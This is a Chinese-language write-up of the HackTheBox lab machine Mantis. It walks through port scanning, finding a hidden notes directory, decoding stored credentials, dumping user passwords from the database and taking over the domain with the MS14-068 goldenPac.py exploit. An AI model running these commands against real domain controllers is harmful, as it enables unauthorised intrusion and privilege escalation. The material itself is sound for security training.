基本信息

端口扫描

需要全端口扫描,用到的1337端口默认扫不到:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
$ nmap -p- 10.10.10.52
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-18 13:39 CST
Nmap scan report for 10.10.10.52
Host is up (0.067s latency).
Not shown: 65508 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1337/tcp open waste
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
8080/tcp open http-proxy
9389/tcp open adws
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49164/tcp open unknown
49165/tcp open unknown
49168/tcp open unknown
50255/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 903.78 seconds

8080

是一个Orchard Blog:

任意构造404能够得到login链接:

1337

直接访问是IIS默认页面:

目录扫描

1337端口目录扫描,得到一个目录:

1
2
3
4
gobuster dir -u http://10.10.10.52:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
...
/secure_notes (Status: 301)
...

dev_notes

这个是OrchardCMS相关文档,里面有admin密码信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt

1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

# 这里中间很多空行,页面最下面还有
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez

blog admin password

上面得到的是密码的二进制形式,解码得到密码:

1
@dm!n_P@ssW0rd!

但这个管理界面没什么可利用的地方:

sql password

另外这个文件名base64 hex解码后得到的就是数据库密码,用户名是admin:

1
m$$ql_S@_P@ssW0rd!

orcharddb

然后连接数据库查看信息,得到用户名密码信息:

1
2
3
4
5
6
7
SELECT name FROM master.dbo.sysdatabases;
SELECT * FROM orcharddb.INFORMATION_SCHEMA.TABLES;
SELECT * FROM orcharddb.INFORMATION_SCHEMA.COLUMNS;
USE orcharddb;
SELECT * FROM blog_Orchard_Users_UserPartRecord;

james@htb.local james J@m3s_P@ssW0rd!

MS14-068

james用户账号密码可以rpc登录获取一些信息,但不能wmi,psexec之类的方式得到shell:

1
2
3
4
5
6
7
8
9
10
➜  Mantis rpcclient -U htb.local/james 10.10.10.52
Enter HTB.LOCAL\james's password:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)
rpcclient $>

搜索之后尝试ms14-068:

goldenPac

需要加一下hosts:

1
10.10.10.52 htb.local mantis.htb.local

可以一步步来,也可以直接用impacket自带的goldenPac.py一键打:

1
python3 goldenPac.py htb.local/james:J@m3s_P@ssW0rd\!@mantis.htb.local

flags

然后直接去读取user.txt和root.txt:

1
2
type C:\Users\james\desktop\user.txt
type C:\Users\administrator\desktop\root.txt

参考资料